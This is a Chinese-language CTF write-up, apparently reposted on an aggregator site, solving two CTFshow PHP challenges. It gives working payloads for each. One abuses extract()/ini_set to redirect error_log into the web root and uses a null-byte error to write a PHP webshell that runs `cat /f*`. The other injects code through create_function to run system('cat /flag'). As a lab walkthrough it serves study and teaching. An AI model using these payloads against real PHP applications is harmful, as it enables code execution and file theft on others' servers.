当前位置: 首页 > news >正文

CTFshow 限时活动 红包挑战7、红包挑战8

news 2025/8/13 5:03:21

CTFshow红包挑战7

写不出来一点,还是等了官方wp之后才复现。

image-20230814014654410

image-20230809140127263

直接给了源码

image-20230809140136952

<?php
highlight_file(__FILE__);
error_reporting(2);extract($_GET);
ini_set($name,$value);system("ls '".filter($_GET[1])."'"
);function filter($cmd){$cmd = str_replace("'","",$cmd);$cmd = str_replace("\\","",$cmd);$cmd = str_replace("`","",$cmd);$cmd = str_replace("$","",$cmd);return $cmd;
}

extract:从数组中将变量导入到当前的符号表

ini_set:为一个配置选项设置值(我们可以修改配置项)

报错等级是2。他限定只能使用ls 什么什么,而且filter自定义函数过滤了'\ 、`` $这四个字符。不好使用闭合来绕过对getshell`的限制。

既然ls 什么什么里面的什么什么可以控制,那就先遍历目录来看看吧。

?1=/usr/local/lib/php/extensions/no-debug-non-zts-20180731/

当前环境存在5个扩展,包含xdebug。分别是mysqli.so opcache.so pdo_mysql.so sodium.so xdebug.so

image-20230814004001812

PHP版本是7.3.22

image-20230809145714849

输入?1=/,服务端内部语句拼接为ls '/'。返回了根目录下所有文件。

image-20230809141940032

flag应该就在flag文件中

开始思索题目。感觉关键代码是这三句:

//不同寻常的报错等级
error_reporting(2);//修改$name,$value
extract($_GET);//开启某个配置项
ini_set($name,$value);

程序执行期间的ini_set不能disable_functions,无法直接禁用str_replace函数

知识点:

xdebug在处理截断问题的时候,会将异常payload回显。而system刚好可以用0字节(%00或者\000)进行截断来触发异常。

思路:

通过触发异常后,将回显的内容(可控)写入到web目录(修改配置项,把报错写入自定义报错日志)。即可实现写马到文件。

ini_set("display_errors", "On");//打开错误提示,与题目无关,只是扩展
ini_set("error_reporting",E_ALL);//显示所有错误,与题目无关,只是扩展ini_set("error_log",""/var/www/html/1.php");
//把报错信息写入web目录下的1.php文件中

尝试看看报错,%00确实能截断导致报错。

image-20230814011351613

payload:

?name=error_log&value=/var/www/html/1.php&1=%00<?php system("cat /f*");?>

image-20230814011519435

可以发现,报错已经写入自定义的报错日志,同时,报错代码被自动执行了。

image-20230814011539368

此外,官方wp还给了一种造成报错的方法:

/?name=error_log&value=1.php
&1=("%0C%08%00%00"^"`{ %2f")<?php system("cat /*");?>

("%0C%08%00%00"^"`{ %2f")即EKc ^URL编码后EKc%20%02^

image-20230814014146477

但是直接

?name=error_log&value=1.php
&1=EKc%20%02^<?php system("cat /*");?>

是无法造成报错的,这种造成报错方式有待细细研究。

image-20230814011817769

image-20230814011839275

CTFshow红包挑战8

考点:PHP create_function

扩展练习(相关题目):NSS [NISACTF 2022]level-up

源码直接给了。

<?phphighlight_file(__FILE__);
error_reporting(0);extract($_GET);
create_function($name,base64_encode($value))();
?>

create_function($name,base64_encode($value))();相当于创建匿名函数后直接执行。就像nmhs();这样。

其中,$name是参数,base64_encode($value)是要执行的代码段,但是这里base64编码过了,执行不了。

可以看作如下代码:(片段1)【一定要当作函数片段来看,而不是一行有参数的函数调用】

nmhs($name){base64_encode($value)
}

那我就不要base64_encode($value),直接从$name开始构造。

先看看payload:

?value=Jay17&name=){}phpinfo();/*

我们把payload中$name带入片段1。

片段1nmhs($name){base64_encode($value)
}

带入$name
nmhs(){}phpinfo();/*){base64_encode($value)
}

整理一下
nmhs(){}phpinfo();
/*){base64_encode($value)
}

最终payload:

?value=Jay17&name=){}system("cat /flag");/*

image-20230812161026056

http://www.lryc.cn/news/123775.html

相关文章:

  • Redis使用Lua脚本和Redisson来保证库存扣减中的原子性和一致性
  • 【从零开始学Kaggle竞赛】泰坦尼克之灾
  • 输出无重复的3位数和计算无人机飞行坐标
  • muduo 29 异步日志
  • Qt 对象序列化/反序列化
  • 从零学算法(非官方题库)
  • Java # JVM内存管理
  • 大疆第二批笔试复盘
  • 【Linux】磁盘或内存 占用比较高要怎么排
  • 解决xss转义导致转码的问题
  • numba 入门示例
  • BUUCTF 还原大师 1
  • 自定义hook之首页数据请求动作封装 hooks
  • 2023上半年京东手机行业品牌销售排行榜(京东数据平台)
  • lodash之cloneDeep()源码阅读笔记
  • 算法模版,今天开始背
  • 新的 Python URL 解析漏洞可能导致命令执行攻击
  • react项目做的h5页面加载缓慢优化(3s优化到0.6s)
  • 如何修复损坏的DOC和DOCX格式Word文件?
  • UI设计师个人工作感悟5篇
  • Java堆、栈、内存的知识
  • tp6 RabbitMQ
  • java Spring Boot yml多环境拆分文件管理优化
  • 【设计模式——学习笔记】23种设计模式——状态模式State(原理讲解+应用场景介绍+案例介绍+Java代码实现)
  • 【LeetCode每日一题】——41.缺失的第一个正数
  • typedef函数代码段解释以及部分Windows下的系统函数
  • Typora常用手册
  • 互联网发展历程:从网线不够长到中继器的引入
  • 【Java】异常处理 之 使用SLF4J 和 Logback
  • C++11并发与多线程笔记 (1)